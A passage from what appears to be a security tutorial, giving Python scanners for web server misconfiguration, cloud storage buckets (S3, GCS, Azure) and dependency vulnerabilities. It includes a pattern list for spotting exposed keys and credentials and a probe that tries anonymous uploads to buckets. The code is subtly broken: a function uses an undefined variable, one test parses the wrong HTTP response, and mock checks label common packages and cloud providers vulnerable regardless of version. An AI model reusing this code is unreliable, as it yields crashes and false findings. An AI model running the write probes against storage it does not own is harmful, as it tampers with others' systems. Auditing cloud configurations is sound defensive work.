        elif 'wordpress' in html.lower() or '/wp-content/' in html:
            return 'wordpress'
        elif 'node.js' in server or 'express' in server:
            return 'node'
        elif '.net' in powered_by or 'asp.net' in server:
            return 'aspnet'
        
        return 'unknown'
    
    def run_comprehensive_scan(self):
        """Run all scans and generate report"""
        print(f"[*] Starting comprehensive misconfiguration scan for {self.target_url}")
        
        with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
            futures = {
                executor.submit(self.scan_web_server): 'web_server',
                executor.submit(self.scan_framework_config): 'framework',
                executor.submit(self.scan_cloud_misconfig): 'cloud',
                executor.submit(self.scan_container_misconfig): 'container',
                executor.submit(self.scan_application_misconfig): 'application'
            }
            
            for future in concurrent.futures.as_completed(futures):
                scan_type = futures[future]
                try:
                    findings = future.result()
                    self.findings.extend(findings)
                    print(f"[+] {scan_type} scan completed: {len(findings)} findings")
                except Exception as e:
                    print(f"[-] {scan_type} scan failed: {e}")
        
        # Generate report
        report = self.generate_report()
        return report
    
    def generate_report(self):
        """Generate comprehensive report"""
        report = {
            'target': self.target_url,
            'scan_date': time.strftime('%Y-%m-%d %H:%M:%S'),
            'total_findings': len(self.findings),
            'findings_by_severity': {},
            'detailed_findings': self.findings
        }
        
        # Count by severity
        severities = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']
        for severity in severities:
            count = sum(1 for f in self.findings if f['severity'] == severity)
            report['findings_by_severity'][severity] = count
        
        return report

# Usage
scanner = SecurityMisconfigScanner("http://target.com")
report = scanner.run_comprehensive_scan()

print(f"\n{'='*60}")
print(f"SECURITY MISCONFIGURATION SCAN REPORT")
print(f"{'='*60}")
print(f"Target: {report['target']}")
print(f"Scan Date: {report['scan_date']}")
print(f"Total Findings: {report['total_findings']}")
print(f"\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
    if count > 0:
        print(f"  {severity}: {count}")

# Print critical findings
critical_findings = [f for f in report['detailed_findings'] if f['severity'] == 'CRITICAL']
if critical_findings:
    print(f"\nCRITICAL FINDINGS:")
    for finding in critical_findings[:5]:  # Show first 5
        print(f"  - {finding['issue']}")
        print(f"    Evidence: {finding['evidence'][:100]}...")

Cloud Storage Misconfiguration Scanner

#!/usr/bin/env python3
"""
Advanced Cloud Storage Misconfiguration Scanner
Covers AWS S3, Google Cloud Storage, Azure Blob Storage
"""
import boto3
from botocore.exceptions import ClientError, NoCredentialsError
import google.cloud.storage
from google.cloud import storage
from azure.storage.blob import BlobServiceClient
import requests
import re
from typing import List, Dict
import json

class CloudStorageScanner:
    def __init__(self, aws_profile=None, gcp_credentials=None, azure_connection_string=None):
        self.aws_profile = aws_profile
        self.gcp_credentials = gcp_credentials
        self.azure_connection_string = azure_connection_string
        self.findings = []
    
    def scan_aws_s3(self):
        """Scan AWS S3 buckets for misconfigurations"""
        s3_findings = []
        
        try:
            if self.aws_profile:
                session = boto3.Session(profile_name=self.aws_profile)
            else:
                session = boto3.Session()
            
            s3 = session.client('s3')
            s3_resource = session.resource('s3')
            
            # List all buckets
            response = s3.list_buckets()
            buckets = response['Buckets']
            
            print(f"[*] Found {len(buckets)} S3 buckets")
            
            for bucket in buckets:
                bucket_name = bucket['Name']
                print(f"[*] Scanning bucket: {bucket_name}")
                
                bucket_findings = []
                
                # 1. Check bucket policy
                try:
                    policy = s3.get_bucket_policy(Bucket=bucket_name)
                    bucket_findings.extend(
                        self.analyze_bucket_policy(policy['Policy'], bucket_name)
                    )
                except ClientError as e:
                    if e.response['Error']['Code'] == 'NoSuchBucketPolicy':
                        bucket_findings.append({
                            'bucket': bucket_name,
                            'issue': 'No bucket policy configured',
                            'severity': 'MEDIUM',
                            'details': 'Bucket has no policy, relying on ACLs'
                        })
                
                # 2. Check bucket ACL
                try:
                    acl = s3.get_bucket_acl(Bucket=bucket_name)
                    bucket_findings.extend(
                        self.analyze_bucket_acl(acl, bucket_name)
                    )
                except ClientError as e:
                    bucket_findings.append({
                        'bucket': bucket_name,
                        'issue': 'Failed to retrieve bucket ACL',
                        'severity': 'MEDIUM',
                        'details': str(e)
                    })
                
                # 3. Check public access block
                try:
                    public_access = s3.get_public_access_block(Bucket=bucket_name)
                    bucket_findings.extend(
                        self.analyze_public_access_block(public_access, bucket_name)
                    )
                except ClientError as e:
                    # Public access block might not be configured
                    pass
                
                # 4. Check for sensitive files
                try:
                    paginator = s3.get_paginator('list_objects_v2')
                    for page in paginator.paginate(Bucket=bucket_name):
                        if 'Contents' in page:
                            for obj in page['Contents']:
                                key = obj['Key']
                                if self.is_sensitive_file(key):
                                    bucket_findings.append({
                                        'bucket': bucket_name,
                                        'issue': 'Sensitive file found in bucket',
                                        'severity': 'HIGH',
                                        'details': f'File: {key}',
                                        'url': f'https://{bucket_name}.s3.amazonaws.com/{key}'
                                    })
                except ClientError as e:
                    bucket_findings.append({
                        'bucket': bucket_name,
                        'issue': 'Failed to list bucket contents',
                        'severity': 'MEDIUM',
                        'details': str(e)
                    })
                
                # 5. Check bucket encryption
                try:
                    encryption = s3.get_bucket_encryption(Bucket=bucket_name)
                    # Encryption is enabled
                except ClientError as e:
                    if e.response['Error']['Code'] == 'ServerSideEncryptionConfigurationNotFoundError':
                        bucket_findings.append({
                            'bucket': bucket_name,
                            'issue': 'Server-side encryption not enabled',
                            'severity': 'MEDIUM',
                            'details': 'Bucket does not have default encryption configured'
                        })
                
                # 6. Check for static website hosting
                try:
                    website = s3.get_bucket_website(Bucket=bucket_name)
                    bucket_findings.append({
                        'bucket': bucket_name,
                        'issue': 'Static website hosting enabled',
                        'severity': 'LOW',
                        'details': 'Bucket configured for static website hosting',
                        'url': f'http://{bucket_name}.s3-website-{session.region_name}.amazonaws.com'
                    })
                except ClientError as e:
                    # Website hosting not enabled
                    pass
                
                # 7. Test for public read access
                public_test = self.test_public_access(bucket_name)
                if public_test['is_public']:
                    bucket_findings.append({
                        'bucket': bucket_name,
                        'issue': 'Bucket is publicly accessible',
                        'severity': 'CRITICAL' if public_test['can_list'] else 'HIGH',
                        'details': public_test['details'],
                        'public_url': f'https://{bucket_name}.s3.amazonaws.com/'
                    })
                
                s3_findings.extend(bucket_findings)
                
        except NoCredentialsError:
            print("[-] No AWS credentials found")
        except Exception as e:
            print(f"[-] AWS S3 scan error: {e}")
        
        return s3_findings
    
    def analyze_bucket_policy(self, policy_json, bucket_name):
        """Analyze S3 bucket policy for misconfigurations"""
        findings = []
        
        try:
            policy = json.loads(policy_json)
            
            for statement in policy.get('Statement', []):
                # Check for wildcard principals
                principal = statement.get('Principal', {})
                if principal == '*':
                    findings.append({
                        'bucket': bucket_name,
                        'issue': 'Wildcard principal in bucket policy',
                        'severity': 'CRITICAL',
                        'details': 'Policy allows access from any principal',
                        'statement': statement
                    })
                
                # Check for overly permissive actions
                action = statement.get('Action', [])
                if isinstance(action, str):
                    action = [action]
                
                dangerous_actions = [
                    's3:*', 's3:Get*', 's3:Put*', 's3:Delete*',
                    's3:List*', '*'
                ]
                
                for act in action:
                    if act in dangerous_actions:
                        findings.append({
                            'bucket': bucket_name,
                            'issue': 'Overly permissive action in bucket policy',
                            'severity': 'HIGH',
                            'details': f'Action: {act}',
                            'statement': statement
                        })
                
                # Check resource wildcards
                resource = statement.get('Resource', [])
                if isinstance(resource, str):
                    resource = [resource]
                
                for res in resource:
                    if '*' in res:
                        findings.append({
                            'bucket': bucket_name,
                            'issue': 'Wildcard resource in bucket policy',
                            'severity': 'MEDIUM',
                            'details': f'Resource: {res}',
                            'statement': statement
                        })
        
        except json.JSONDecodeError:
            findings.append({
                'bucket': bucket_name,
                'issue': 'Invalid bucket policy JSON',
                'severity': 'MEDIUM',
                'details': 'Bucket policy contains invalid JSON'
            })
        
        return findings
    
    def test_public_access(self, bucket_name):
        """Test if bucket is publicly accessible"""
        result = {
            'is_public': False,
            'can_list': False,
            'can_read': False,
            'can_write': False,
            'details': ''
        }
        
        # Test 1: List objects (anonymous)
        try:
            response = requests.get(f'https://{bucket_name}.s3.amazonaws.com/', timeout=10)
            if response.status_code == 200:
                result['is_public'] = True
                result['can_list'] = True
                result['details'] += 'Bucket listing is public. '
        except:
            pass
        
        # Test 2: Try to upload a file (anonymous PUT)
        test_key = f'test_public_write_{int(time.time())}.txt'
        test_url = f'https://{bucket_name}.s3.amazonaws.com/{test_key}'
        
        try:
            response = requests.put(
                test_url,
                data='test',
                headers={'Content-Type': 'text/plain'},
                timeout=10
            )
            if response.status_code == 200:
                result['can_write'] = True
                result['details'] += 'Bucket allows public writes. '
                
                # Clean up test file
                requests.delete(test_url, timeout=5)
        except:
            pass
        
        # Test 3: Try to download a known file (if we can list)
        if result['can_list']:
            # Parse list to get a file
            import xml.etree.ElementTree as ET
            root = ET.fromstring(response.content)
            for elem in root.findall('.//{http://s3.amazonaws.com/doc/2006-03-01/}Key'):
                test_file = elem.text
                if not test_file.endswith('/'):  # Not a folder
                    file_url = f'https://{bucket_name}.s3.amazonaws.com/{test_file}'
                    file_response = requests.head(file_url, timeout=10)
                    if file_response.status_code == 200:
                        result['can_read'] = True
                        result['details'] += 'Bucket contains publicly readable files. '
                    break
        
        return result
    
    def scan_google_cloud_storage(self):
        """Scan Google Cloud Storage buckets"""
        gcs_findings = []
        
        try:
            if self.gcp_credentials:
                storage_client = storage.Client.from_service_account_json(self.gcp_credentials)
            else:
                storage_client = storage.Client()
            
            buckets = list(storage_client.list_buckets())
            print(f"[*] Found {len(buckets)} GCS buckets")
            
            for bucket in buckets:
                bucket_findings = []
                
                # 1. Check IAM policy
                policy = bucket.get_iam_policy()
                
                for binding in policy.bindings:
                    # Check for allUsers or allAuthenticatedUsers
                    if 'allUsers' in binding.members:
                        bucket_findings.append({
                            'bucket': bucket.name,
                            'issue': 'Bucket accessible to all users (allUsers)',
                            'severity': 'CRITICAL',
                            'details': f'Role: {binding.role}, Members: {binding.members}'
                        })
                    
                    if 'allAuthenticatedUsers' in binding.members:
                        bucket_findings.append({
                            'bucket': bucket.name,
                            'issue': 'Bucket accessible to all authenticated users',
                            'severity': 'HIGH',
                            'details': f'Role: {binding.role}, Members: {binding.members}'
                        })
                
                # 2. Check bucket permissions (ACL)
                acl = bucket.acl
                
                for entry in acl:
                    if entry['entity'] in ['allUsers', 'allAuthenticatedUsers']:
                        bucket_findings.append({
                            'bucket': bucket.name,
                            'issue': f'Bucket ACL allows public access: {entry["entity"]}',
                            'severity': 'HIGH',
                            'details': f'Role: {entry["role"]}'
                        })
                
                # 3. Check for uniform bucket-level access
                if not bucket.iam_configuration.uniform_bucket_level_access:
                    bucket_findings.append({
                        'bucket': bucket.name,
                        'issue': 'Uniform bucket-level access disabled',
                        'severity': 'MEDIUM',
                        'details': 'Using fine-grained ACLs instead of IAM'
                    })
                
                # 4. Check default object ACL
                default_acl = bucket.default_object_acl
                
                for entry in default_acl:
                    if entry['entity'] in ['allUsers', 'allAuthenticatedUsers']:
                        bucket_findings.append({
                            'bucket': bucket.name,
                            'issue': 'Default object ACL allows public access',
                            'severity': 'HIGH',
                            'details': f'Entity: {entry["entity"]}, Role: {entry["role"]}'
                        })
                
                gcs_findings.extend(bucket_findings)
                
        except Exception as e:
            print(f"[-] GCS scan error: {e}")
        
        return gcs_findings
    
    def scan_azure_blob_storage(self):
        """Scan Azure Blob Storage containers"""
        azure_findings = []
        
        if not self.azure_connection_string:
            print("[-] Azure connection string required")
            return azure_findings
        
        try:
            blob_service_client = BlobServiceClient.from_connection_string(
                self.azure_connection_string
            )
            
            containers = blob_service_client.list_containers()
            containers_list = list(containers)
            
            print(f"[*] Found {len(containers_list)} Azure containers")
            
            for container in containers_list:
                container_findings = []
                container_name = container['name']
                
                # Get container client
                container_client = blob_service_client.get_container_client(container_name)
                
                # Check container access policy
                access_policy = container_client.get_container_access_policy()
                
                # Check if public access is allowed
                if container['public_access'] != 'None':
                    container_findings.append({
                        'container': container_name,
                        'issue': f'Container has public access: {container["public_access"]}',
                        'severity': 'CRITICAL' if container['public_access'] == 'container' else 'HIGH',
                        'details': f'Access level: {container["public_access"]}'
                    })
                
                # Check signed identifiers (SAS policies)
                if access_policy['signed_identifiers']:
                    for sid in access_policy['signed_identifiers'].values():
                        # Check for overly permissive policies
                        permissions = sid.access_policy.permission
                        if 'r' in permissions and 'w' in permissions:
                            container_findings.append({
                                'container': container_name,
                                'issue': 'SAS policy allows both read and write',
                                'severity': 'HIGH',
                                'details': f'Permissions: {permissions}'
                            })
                
                # Check for sensitive blobs
                try:
                    blobs = container_client.list_blobs()
                    for blob in blobs:
                        if self.is_sensitive_file(blob.name):
                            container_findings.append({
                                'container': container_name,
                                'issue': 'Sensitive blob found',
                                'severity': 'HIGH',
                                'details': f'Blob: {blob.name}',
                                'url': f'https://{blob_service_client.account_name}.blob.core.windows.net/{container_name}/{blob.name}'
                            })
                except:
                    pass
                
                azure_findings.extend(container_findings)
                
        except Exception as e:
            print(f"[-] Azure storage scan error: {e}")
        
        return azure_findings
    
    def is_sensitive_file(self, filename):
        """Check if filename indicates sensitive content"""
        sensitive_patterns = [
            r'\.(pem|key|ppk|p12|pfx|crt|cer)$',  # Certificates/keys
            r'\.(env|config|conf|ini|properties|yml|yaml|xml|json)$',  # Config files
            r'\.(sql|db|sqlite|mdb|accdb)$',  # Database files
            r'\.(log|txt)$',  # Log files
            r'\.(bak|backup|old|orig|save|swp|tmp)$',  # Backup files
            r'(password|secret|token|key|credential)',  # Sensitive names
            r'(id_rsa|id_dsa|id_ecdsa)',  # SSH keys
            r'\.git/',  # Git files
        ]
        
        filename_lower = filename.lower()
        for pattern in sensitive_patterns:
            if re.search(pattern, filename_lower):
                return True
        
        return False
    
    def run_cloud_storage_scan(self):
        """Run complete cloud storage scan"""
        print("[*] Starting cloud storage misconfiguration scan")
        
        all_findings = []
        
        # AWS S3
        print("[*] Scanning AWS S3...")
        s3_findings = self.scan_aws_s3()
        all_findings.extend(s3_findings)
        print(f"[+] AWS S3 scan complete: {len(s3_findings)} findings")
        
        # Google Cloud Storage
        print("[*] Scanning Google Cloud Storage...")
        gcs_findings = self.scan_google_cloud_storage()
        all_findings.extend(gcs_findings)
        print(f"[+] GCS scan complete: {len(gcs_findings)} findings")
        
        # Azure Blob Storage
        print("[*] Scanning Azure Blob Storage...")
        azure_findings = self.scan_azure_blob_storage()
        all_findings.extend(azure_findings)
        print(f"[+] Azure scan complete: {len(azure_findings)} findings")
        
        # Generate report
        report = {
            'total_findings': len(all_findings),
            'findings_by_severity': self.categorize_findings(all_findings),
            'findings_by_service': {
                'AWS S3': len(s3_findings),
                'Google Cloud Storage': len(gcs_findings),
                'Azure Blob Storage': len(azure_findings)
            },
            'detailed_findings': all_findings
        }
        
        return report
    
    def categorize_findings(self, findings):
        """Categorize findings by severity"""
        categories = {
            'CRITICAL': [],
            'HIGH': [],
            'MEDIUM': [],
            'LOW': []
        }
        
        for finding in findings:
            severity = finding.get('severity', 'MEDIUM')
            if severity in categories:
                categories[severity].append(finding)
        
        return {k: len(v) for k, v in categories.items()}

# Usage
import time

scanner = CloudStorageScanner(
    aws_profile='production',
    gcp_credentials='/path/to/credentials.json',
    azure_connection_string='DefaultEndpointsProtocol=https;AccountName=...'
)

report = scanner.run_cloud_storage_scan()

print(f"\n{'='*60}")
print("CLOUD STORAGE MISCONFIGURATION REPORT")
print(f"{'='*60}")
print(f"Total Findings: {report['total_findings']}")
print(f"\nFindings by Service:")
for service, count in report['findings_by_service'].items():
    if count > 0:
        print(f"  {service}: {count}")

print(f"\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
    if count > 0:
        print(f"  {severity}: {count}")

# Print critical findings
critical_findings = [f for f in report['detailed_findings'] if f.get('severity') == 'CRITICAL']
if critical_findings:
    print(f"\nCRITICAL FINDINGS:")
    for finding in critical_findings[:5]:
        print(f"  - {finding.get('bucket', finding.get('container', 'Unknown'))}: {finding['issue']}")

Chapter 6: Vulnerable Components - Advanced Dependency Analysis

6.1 Comprehensive Dependency Vulnerability Scanning

#!/usr/bin/env python3
"""
Advanced Dependency Vulnerability Scanner
Integrates multiple vulnerability databases and scanners
"""
import subprocess
import json
import yaml
import toml
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Dict, List, Set
import requests
from datetime import datetime
import concurrent.futures

class DependencyVulnerabilityScanner:
    def __init__(self, project_path):
        self.project_path = Path(project_path)
        self.vulnerabilities = []
        self.vulnerability_sources = {
            'nvd': 'https://services.nvd.nist.gov/rest/json/cves/1.0',
            'oss_index': 'https://ossindex.sonatype.org/api/v3/component-report',
            'github_advisory': 'https://api.github.com/advisories'
        }
    
    def scan_all_dependencies(self):
        """Scan all dependency files in project"""
        print(f"[*] Scanning project at {self.project_path}")
        
        dependency_files = self.find_dependency_files()
        print(f"[*] Found {len(dependency_files)} dependency files")
        
        all_vulnerabilities = []
        
        for dep_file in dependency_files:
            print(f"[*] Scanning {dep_file.relative_to(self.project_path)}")
            vulns = self.scan_dependency_file(dep_file)
            all_vulnerabilities.extend(vulns)
        
        # Remove duplicates
        unique_vulns = self.deduplicate_vulnerabilities(all_vulnerabilities)
        
        # Generate report
        report = self.generate_report(unique_vulns)
        return report
    
    def find_dependency_files(self):
        """Find all dependency files in project"""
        dependency_patterns = [
            # Package managers
            'package.json', 'yarn.lock', 'package-lock.json',
            'requirements.txt', 'Pipfile', 'Pipfile.lock', 'poetry.lock',
            'composer.json', 'composer.lock',
            'Gemfile', 'Gemfile.lock',
            'pom.xml', 'build.gradle', 'build.gradle.kts',
            'go.mod', 'go.sum',
            'Cargo.toml', 'Cargo.lock',
            'nuget.config', 'packages.config',
            '*.csproj', '*.vbproj',
            
            # Configuration files that might contain dependencies
            '.terraform.lock.hcl',
            'docker-compose.yml', 'docker-compose.yaml',
            'Dockerfile',
            'environment.yml',  # Conda
            
            # Infrastructure as Code
            '*.tf',  # Terraform
            '*.yml', '*.yaml',  # Ansible, Kubernetes
            
            # CI/CD
            '.github/workflows/*.yml', '.github/workflows/*.yaml',
            '.gitlab-ci.yml',
            'Jenkinsfile',
            '.circleci/config.yml',
            
            # IDE/Editor
            '.vsconfig',
        ]
        
        found_files = []
        
        for pattern in dependency_patterns:
            if '*' in pattern:
                # Handle glob patterns
                for file in self.project_path.rglob(pattern):
                    if file.is_file():
                        found_files.append(file)
            else:
                # Specific file names
                for file in self.project_path.rglob(pattern):
                    if file.is_file():
                        found_files.append(file)
        
        return list(set(found_files))
    
    def scan_dependency_file(self, file_path):
        """Scan specific dependency file"""
        vulns = []
        
        # Determine file type and use appropriate scanner
        file_ext = file_path.suffix.lower()
        file_name = file_path.name.lower()
        
        try:
            if file_name == 'package.json':
                vulns = self.scan_npm_package(file_path)
            elif file_name in ['yarn.lock', 'package-lock.json']:
                vulns = self.scan_npm_lockfile(file_path)
            elif file_name == 'requirements.txt':
                vulns = self.scan_pip_requirements(file_path)
            elif file_name in ['pom.xml', 'build.gradle', 'build.gradle.kts']:
                vulns = self.scan_java_dependencies(file_path)
            elif file_name in ['gemfile', 'gemfile.lock']:
                vulns = self.scan_ruby_gems(file_path)
            elif file_name in ['composer.json', 'composer.lock']:
                vulns = self.scan_php_composer(file_path)
            elif file_name in ['go.mod', 'go.sum']:
                vulns = self.scan_go_modules(file_path)
            elif file_name in ['cargo.toml', 'cargo.lock']:
                vulns = self.scan_rust_cargo(file_path)
            elif file_name in ['dockerfile']:
                vulns = self.scan_dockerfile(file_path)
            elif file_ext in ['.tf', '.hcl']:
                vulns = self.scan_terraform(file_path)
            elif file_ext in ['.yml', '.yaml']:
                vulns = self.scan_yaml_dependencies(file_path)
            elif file_ext in ['.csproj', '.vbproj']:
                vulns = self.scan_dotnet_proj(file_path)
        except Exception as e:
            print(f"[-] Error scanning {file_path}: {e}")
        
        return vulns
    
    def scan_npm_package(self, file_path):
        """Scan npm package.json for vulnerabilities"""
        vulns = []
        
        with open(file_path) as f:
            package_data = json.load(f)
        
        # Check dependencies
        all_deps = {}
        all_deps.update(package_data.get('dependencies', {}))
        all_deps.update(package_data.get('devDependencies', {}))
        all_deps.update(package_data.get('peerDependencies', {}))
        all_deps.update(package_data.get('optionalDependencies', {}))
        
        # Use npm audit or check against vulnerability DB
        for dep, version in all_deps.items():
            # Clean version string
            clean_version = version.replace('^', '').replace('~', '').replace('>=', '').replace('<=', '')
            
            # Check vulnerability databases
            dep_vulns = self.check_vulnerability_db('npm', dep, clean_version)
            vulns.extend(dep_vulns)
        
        return vulns
    
    def scan_npm_lockfile(self, file_path):
        """Scan npm lockfile for precise versions"""
        vulns = []
        
        with open(file_path) as f:
            if file_path.name == 'package-lock.json':
                lock_data = json.load(f)
                # Parse package-lock.json structure
                if 'packages' in lock_data:
                    for pkg_path, pkg_info in lock_data['packages'].items():
                        if pkg_path and 'version' in pkg_info:
                            pkg_name = pkg_path.split('node_modules/')[-1]
                            if not pkg_name.startswith('@'):
                                dep_vulns = self.check_vulnerability_db(
                                    'npm', pkg_name, pkg_info['version']
                                )
                                vulns.extend(dep_vulns)
            elif file_path.name == 'yarn.lock':
                # Parse yarn.lock
                content = f.read()
                # Simplified parsing - in reality, use proper parser
                lines = content.split('\n')
                current_pkg = None
                current_version = None
                
                for line in lines:
                    line = line.strip()
                    if line and not line.startswith('#'):
                        if '"' in line and '@' in line:
                            # Package line
                            parts = line.split('@')
                            if len(parts) >= 2:
                                current_pkg = parts[0].strip('" ')
                                version_part = parts[1].split(',')[0].strip('" ')
                                if version_part:
                                    current_version = version_part
                        elif 'version' in line.lower():
                            # Version line
                            version = line.split('"')[1] if '"' in line else line.split()[-1]
                            if current_pkg and current_version:
                                dep_vulns = self.check_vulnerability_db(
                                    'npm', current_pkg, version
                                )
                                vulns.extend(dep_vulns)
                                current_pkg = None
                                current_version = None
        
        return vulns
    
    def scan_pip_requirements(self, file_path):
        """Scan Python requirements.txt"""
        vulns = []
        
        with open(file_path) as f:
            for line in f:
                line = line.strip()
                if line and not line.startswith('#'):
                    # Parse package name and version
                    parts = line.split('==')
                    if len(parts) == 2:
                        pkg_name = parts[0].strip()
                        version = parts[1].strip()
                        
                        # Check for extras
                        if '[' in pkg_name:
                            pkg_name = pkg_name.split('[')[0]
                        
                        dep_vulns = self.check_vulnerability_db('pypi', pkg_name, version)
                        vulns.extend(dep_vulns)
        
        return vulns
    
    def scan_java_dependencies(self, file_path):
        """Scan Java Maven/Gradle files"""
        vulns = []
        
        if file_path.name == 'pom.xml':
            # Parse Maven pom.xml
            tree = ET.parse(file_path)
            root = tree.getroot()
            
            # Namespace handling
            ns = {'mvn': 'http://maven.apache.org/POM/4.0.0'}
            
            # Check dependencies
            for dep in root.findall('.//mvn:dependency', ns):
                group_id = dep.find('mvn:groupId', ns)
                artifact_id = dep.find('mvn:artifactId', ns)
                version = dep.find('mvn:version', ns)
                
                if group_id is not None and artifact_id is not None and version is not None:
                    pkg_name = f"{group_id.text}:{artifact_id.text}"
                    dep_vulns = self.check_vulnerability_db('maven', pkg_name, version.text)
                    vulns.extend(dep_vulns)
        
        elif 'build.gradle' in file_path.name:
            # Parse Gradle build file (simplified)
            with open(file_path) as f:
                content = f.read()
                
                # Look for dependency declarations
                import re
                
                # implementation, api, compile, runtimeOnly patterns
                patterns = [
                    r"(?:implementation|api|compile|runtimeOnly)\s+['\"]([^:'\"]+):([^:'\"]+):([^:'\"]+)['\"]",
                    r"(?:implementation|api|compile|runtimeOnly)\s+['\"]([^:'\"]+):([^:'\"]+)['\"]",
                ]
                
                for pattern in patterns:
                    matches = re.findall(pattern, content)
                    for match in matches:
                        if len(match) == 3:
                            group, artifact, version = match
                            pkg_name = f"{group}:{artifact}"
                            dep_vulns = self.check_vulnerability_db('maven', pkg_name, version)
                            vulns.extend(dep_vulns)
        
        return vulns
    
    def check_vulnerability_db(self, ecosystem, package, version):
        """Check package against vulnerability databases"""
        vulns = []
        
        # This is a simplified version
        # In reality, you would:
        # 1. Query NVD API
        # 2. Query OSS Index
        # 3. Query GitHub Advisory Database
        # 4. Query internal vulnerability DB
        
        # For demonstration, we'll use a mock check
        critical_packages = {
            'npm': ['lodash', 'express', 'moment', 'axios'],
            'pypi': ['django', 'flask', 'requests', 'urllib3'],
            'maven': ['log4j', 'spring-core', 'jackson-databind'],
        }
        
        if ecosystem in critical_packages:
            if package.lower() in [p.lower() for p in critical_packages[ecosystem]]:
                # Mock vulnerability
                vulns.append({
                    'ecosystem': ecosystem,
                    'package': package,
                    'version': version,
                    'vulnerability': 'CVE-2023-XXXXX',
                    'severity': 'HIGH',
                    'description': 'Mock vulnerability for demonstration',
                    'source': 'mock',
                    'file': str(file_path.relative_to(self.project_path))
                })
        
        return vulns
    
    def scan_dockerfile(self, file_path):
        """Scan Dockerfile for vulnerable base images and packages"""
        vulns = []
        
        with open(file_path) as f:
            lines = f.readlines()
            
            for line in lines:
                line = line.strip()
                
                # Check base image
                if line.upper().startswith('FROM'):
                    parts = line.split()
                    if len(parts) >= 2:
                        image = parts[1]
                        
                        # Check for old or vulnerable base images
                        vulnerable_images = [
                            'node:8', 'python:2.7', 'ubuntu:14.04',
                            'alpine:3.5', 'centos:6', 'debian:8'
                        ]
                        
                        for vulnerable in vulnerable_images:
                            if vulnerable in image:
                                vulns.append({
                                    'file': str(file_path.relative_to(self.project_path)),
                                    'type': 'docker_image',
                                    'image': image,
                                    'vulnerability': 'Outdated base image',
                                    'severity': 'HIGH',
                                    'description': f'Base image {image} is outdated and may contain vulnerabilities'
                                })
                
                # Check for apt-get install without version pins
                elif 'apt-get install' in line and '=' not in line:
                    vulns.append({
                        'file': str(file_path.relative_to(self.project_path)),
                        'type': 'docker_package',
                        'line': line,
                        'vulnerability': 'Unpinned package versions',
                        'severity': 'MEDIUM',
                        'description': 'Package versions should be pinned to avoid unexpected updates'
                    })
        
        return vulns
    
    def scan_terraform(self, file_path):
        """Scan Terraform files for vulnerable providers/modules"""
        vulns = []
        
        with open(file_path) as f:
            content = f.read()
            
            # Look for provider declarations
            import re
            provider_patterns = [
                r'provider\s+"([^"]+)"\s*{',
                r'module\s+"([^"]+)"\s*{'
            ]
            
            for pattern in provider_patterns:
                matches = re.findall(pattern, content)
                for match in matches:
                    # Check for known vulnerable providers/modules
                    vulnerable_providers = [
                        'aws', 'azurerm', 'google', 'kubernetes'
                    ]
                    
                    if any(vp in match.lower() for vp in vulnerable_providers):
                        vulns.append({
                            'file': str(file_path.relative_to(self.project_path)),
                            'type': 'terraform',
                            'provider': match,
                            'vulnerability': 'Potential misconfiguration',
                            'severity': 'MEDIUM',
                            'description': f'Provider {match} may have security implications'
                        })
        
        return vulns
    
    def deduplicate_vulnerabilities(self, vulnerabilities):
        """Remove duplicate vulnerabilities"""
        unique_vulns = []
        seen = set()
        
        for vuln in vulnerabilities:
            # Create unique identifier
            vuln_id = f"{vuln.get('package', '')}:{vuln.get('version', '')}:{vuln.get('vulnerability', '')}"
            
            if vuln_id not in seen:
                seen.add(vuln_id)
                unique_vulns.append(vuln)
        
        return unique_vulns
    
    def generate_report(self, vulnerabilities):
        """Generate comprehensive vulnerability report"""
        report = {
            'scan_date': datetime.now().isoformat(),
            'project_path': str(self.project_path),
            'total_vulnerabilities': len(vulnerabilities),
            'vulnerabilities_by_severity': {},
            'vulnerabilities_by_ecosystem': {},
            'detailed_vulnerabilities': vulnerabilities
        }
        
        # Count by severity
        severities = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']
        for severity in severities:
            count = sum(1 for v in vulnerabilities if v.get('severity') == severity)
            report['vulnerabilities_by_severity'][severity] = count
        
        # Count by ecosystem
        ecosystems = {}
        for vuln in vulnerabilities:
            ecosystem = vuln.get('ecosystem', 'unknown')
            if ecosystem not in ecosystems:
                ecosystems[ecosystem] = 0
            ecosystems[ecosystem] += 1
        
        report['vulnerabilities_by_ecosystem'] = ecosystems
        
        return report

# Advanced integration with actual vulnerability databases
class AdvancedVulnerabilityChecker:
    """Integrates with real vulnerability databases"""
    
    def __init__(self):
        self.cache = {}
        
    def check_nvd(self, cpe_string):
        """Check NVD database"""
        # Format: cpe:2.3:a:apache:log4j:2.14.1:*:*:*:*:*:*:*
        url = f"https://services.nvd.nist.gov/rest/json/cves/1.0?cpeMatchString={cpe_string}"
        
        try:
            response = requests.get(url, timeout=10)
            if response.status_code == 200:
                return response.json()
        except:
            pass
        
        return None
    
    def check_oss_index(self, ecosystem, package, version):
        """Check Sonatype OSS Index"""
        url = "https://ossindex.sonatype.org/api/v3/component-report"
        
        payload = {
            "coordinates": [f"pkg:{ecosystem}/{package}@{version}"]
        }
        
        headers = {
            "Content-Type": "application/json"
        }
        
        try:
            response = requests.post(url, json=payload, headers=headers, timeout=10)
            if response.status_code == 200:
                return response.json()
        except:
            pass
        
        return None
    
    def check_github_advisory(self, ecosystem, package):
        """Check GitHub Advisory Database"""
        url = f"https://api.github.com/advisories"
        params = {
            'ecosystem': ecosystem,
            'package': package
        }
        
        headers = {
            'Accept': 'application/vnd.github+json'
        }
        
        try:
            response = requests.get(url, params=params, headers=headers, timeout=10)
            if response.status_code == 200:
                return response.json()
        except:
            pass
        
        return None

# Usage
scanner = DependencyVulnerabilityScanner("/path/to/your/project")
report = scanner.scan_all_dependencies()

print(f"\n{'='*60}")
print("DEPENDENCY VULNERABILITY SCAN REPORT")
print(f"{'='*60}")
print(f"Project: {report['project_path']}")
print(f"Scan Date: {report['scan_date']}")
print(f"Total Vulnerabilities: {report['total_vulnerabilities']}")

print(f"\nBy Severity:")
for severity, count in report['vulnerabilities_by_severity'].items():
    if count > 0:
        print(f"  {severity}: {count}")

print(f"\nBy Ecosystem:")
for ecosystem, count in report['vulnerabilities_by_ecosystem'].items():
    if count > 0:
        print(f"  {ecosystem}: {count}")

# Print critical vulnerabilities
critical_vulns = [v for v in report['detailed_vulnerabilities'] 
                  if v.get('severity') == 'CRITICAL']
